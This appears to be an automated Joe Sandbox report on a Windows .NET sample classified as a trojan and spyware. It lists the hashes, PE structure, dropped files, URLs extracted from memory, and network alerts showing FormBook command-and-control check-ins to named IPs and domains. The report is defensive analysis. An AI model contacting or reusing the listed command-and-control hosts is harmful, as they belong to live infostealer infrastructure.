                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://digi-searches.com/sk-logabpstatus.php?a=MWlFQ2d5amYxYkhvc2pKQXl3UXEzUFhuMVFMYXlyY3I5aGZUSVNHcieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.kkpmoneysocial.topikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
IP               Domain                  Country                   ASN     ASN Name                         Malicious
154.208.202.225  www.zoomlive.live       Seychelles                134548  DXTL-HKDXTLTseungKwanOServiceHK  true
77.68.64.45      www.dietcoffee.online   United Kingdom            8560    ONEANDONE-ASBrauerstrasse48DE    false
104.21.112.1     www.kkpmoneysocial.top  United States             13335   CLOUDFLARENETUS                  true
209.74.77.107    www.happyjam.life       United States             31744   MULTIBAND-NEWHOPEUS              false
18.139.62.226    dns.ladipage.com        United States             16509   AMAZON-02US                      false
154.12.28.184    www.7261ltajbc.bond     United States             174     COGENT-174US                     false
104.21.32.1      www.aziziyeescortg.xyz  United States             13335   CLOUDFLARENETUS                  false
84.32.84.32      123hellodrive.shop      Lithuania                 33922   NTT-LT-ASLT                      true
208.91.197.27    www.guacamask.online    Virgin Islands (BRITISH)  40034   CONFLUENCE-NETWORK-INCVG         false
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588694
Start date and time:2025-01-11 04:23:32 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:BalphRTkPS.exe
renamed because original name is a hash value
Original Sample Name:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@7/2@11/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 89
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.109.210.53
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                                                                            • 45.197.112.87
                                                                                                            z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 156.237.184.168
                                                                                                            CLOUDFLARENETUSWru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.13.205
                                                                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.18.73.116
                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.167.146
                                                                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.64.1
                                                                                                            https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.205.31
                                                                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350
x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3
                                                                                                            No context
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                            Category:dropped
                                                                                                            Size (bytes):196608
                                                                                                            Entropy (8bit):1.1239949490932863
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.24758705905619
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:BalphRTkPS.exe
                                                                                                            File size:962'560 bytes
                                                                                                            MD5:e3b4ddaa99a7555532ea6b36bff69afc
                                                                                                            SHA1:58f1b2ac036a0192d3226a321c0e6e0e8412c3fb
                                                                                                            SHA256:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929
                                                                                                            SHA512:dc0d96cbf540f242348ec866f3b80eb3263181a780379a839531d9123cd312cd4b58eea01b574db614f2e059c80028708fb1da5c72bb208e100f8eca073389d5
                                                                                                            SSDEEP:12288:bpZsS9uLZf6nmPvktDuptzswN8bTkD+Hm8ix/0UzGMzysWFVyDovD3os+pVv:bzs0udfveuXzXNyTmEmX/0zFVDD3epl
                                                                                                            TLSH:6325E63D29BD222BA075C797CBEBF427F174986F3114ACA498D343A94346A4774C326E
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."#R...............0.............N.... ........@.. ....................... ............@................................
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x4ec54e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0xA5522322 [Thu Nov 22 02:59:46 2057 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xec4fc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x5ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xeabf8 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xea554 | 0xea600 | e2f1d7eb1ed1e44c47a4e477f5891e19 | False | 0.764178125 | data | 7.253794404065134 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xee000 | 0x5ac | 0x600 | 862b3fedd7dc31adbc33ea5800a3f6db | False | 0.4231770833333333 | data | 4.105167481524011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf0000 | 0xc | 0x200 | b3afc73af2709d9f2185f15f76e8a215 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xee090 | 0x31c | data | | | 0.4371859296482412
RT_MANIFEST | 0xee3bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T04:25:15.778243+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49987 | 154.12.28.184 | 80 | TCP
2025-01-11T04:25:15.778243+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49987 | 154.12.28.184 | 80 | TCP
2025-01-11T04:25:32.258273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49992 | 18.139.62.226 | 80 | TCP
2025-01-11T04:25:34.806535+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 18.139.62.226 | 80 | TCP
2025-01-11T04:25:37.356586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 18.139.62.226 | 80 | TCP
2025-01-11T04:25:40.057395+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49995 | 18.139.62.226 | 80 | TCP
2025-01-11T04:25:40.057395+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49995 | 18.139.62.226 | 80 | TCP
2025-01-11T04:25:45.859464+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 104.21.112.1 | 80 | TCP
2025-01-11T04:25:48.426841+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49997 | 104.21.112.1 | 80 | TCP
2025-01-11T04:25:51.015746+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 104.21.112.1 | 80 | TCP
2025-01-11T04:25:53.531690+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49999 | 104.21.112.1 | 80 | TCP
2025-01-11T04:25:53.531690+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 104.21.112.1 | 80 | TCP
2025-01-11T04:26:07.351723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50001 | 209.74.77.107 | 80 | TCP
2025-01-11T04:26:09.894738+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 209.74.77.107 | 80 | TCP
2025-01-11T04:26:12.517423+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50003 | 209.74.77.107 | 80 | TCP
2025-01-11T04:26:15.151839+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50004 | 209.74.77.107 | 80 | TCP
2025-01-11T04:26:15.151839+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50004 | 209.74.77.107 | 80 | TCP
2025-01-11T04:26:20.693264+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 84.32.84.32 | 80 | TCP
2025-01-11T04:26:23.244343+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50006 | 84.32.84.32 | 80 | TCP
2025-01-11T04:26:25.792206+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50007 | 84.32.84.32 | 80 | TCP
2025-01-11T04:26:28.320257+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50008 | 84.32.84.32 | 80 | TCP
2025-01-11T04:26:28.320257+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50008 | 84.32.84.32 | 80 | TCP
2025-01-11T04:26:34.956100+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50009 | 154.208.202.225 | 80 | TCP
2025-01-11T04:26:37.526967+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50010 | 154.208.202.225 | 80 | TCP
2025-01-11T04:26:40.085710+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50011 | 154.208.202.225 | 80 | TCP
2025-01-11T04:26:43.085552+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50012 | 154.208.202.225 | 80 | TCP
2025-01-11T04:26:43.085552+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50012 | 154.208.202.225 | 80 | TCP
2025-01-11T04:26:48.757175+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50014 | 77.68.64.45 | 80 | TCP
2025-01-11T04:26:51.299442+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50015 | 77.68.64.45 | 80 | TCP
2025-01-11T04:26:53.847159+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50016 | 77.68.64.45 | 80 | TCP
2025-01-11T04:26:56.407542+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50017 | 77.68.64.45 | 80 | TCP
2025-01-11T04:26:56.407542+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50017 | 77.68.64.45 | 80 | TCP
2025-01-11T04:27:02.189457+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50018 | 208.91.197.27 | 80 | TCP
2025-01-11T04:27:04.768880+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50019 | 208.91.197.27 | 80 | TCP
2025-01-11T04:27:07.295998+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50020 | 208.91.197.27 | 80 | TCP
2025-01-11T04:27:10.240777+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50021 | 208.91.197.27 | 80 | TCP
2025-01-11T04:27:10.240777+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50021 | 208.91.197.27 | 80 | TCP
2025-01-11T04:27:16.005946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50022 | 84.32.84.32 | 80 | TCP
2025-01-11T04:27:18.571708+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50023 | 84.32.84.32 | 80 | TCP
2025-01-11T04:27:21.119975+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50024 | 84.32.84.32 | 80 | TCP
2025-01-11T04:27:23.657405+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50025 | 84.32.84.32 | 80 | TCP
2025-01-11T04:27:23.657405+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50025 | 84.32.84.32 | 80 | TCP
2025-01-11T04:27:29.362741+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50026 | 104.21.32.1 | 80 | TCP
2025-01-11T04:27:31.902458+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50027 | 104.21.32.1 | 80 | TCP
2025-01-11T04:27:34.991329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 104.21.32.1 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Jan 11, 2025 04:26:09.314332962 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.314451933 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.327924013 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:09.334532976 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894550085 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894567966 CET8050002209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:09.894737959 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:10.837917089 CET5000280192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:11.903053999 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:11.907968998 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:11.908648968 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:12.003396034 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:12.008269072 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.008467913 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517261028 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517359972 CET8050003209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:12.517422915 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:13.509700060 CET5000380192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.562381029 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.567532063 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:14.567735910 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.585371017 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:14.606457949 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.146795034 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.151669979 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:15.151839018 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:15.152626038 CET5000480192.168.2.6209.74.77.107
                                                                                                            Jan 11, 2025 04:26:15.157383919 CET8050004209.74.77.107192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.218405962 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.223241091 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.223334074 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.238878965 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:20.243757010 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.693172932 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:20.693264008 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:21.744117022 CET5000580192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:21.749026060 CET805000584.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:22.763937950 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.768814087 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:22.768925905 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.783435106 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:22.788347006 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:23.244256020 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:23.244343042 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:24.291075945 CET5000680192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:24.295958042 CET805000684.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.310298920 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.315237045 CET805000784.32.84.32192.168.2.6
                                                                                                            Jan 11, 2025 04:26:25.315356970 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.335705996 CET5000780192.168.2.684.32.84.32
                                                                                                            Jan 11, 2025 04:26:25.340534925 CET805000784.32.84.32192.168.2.6
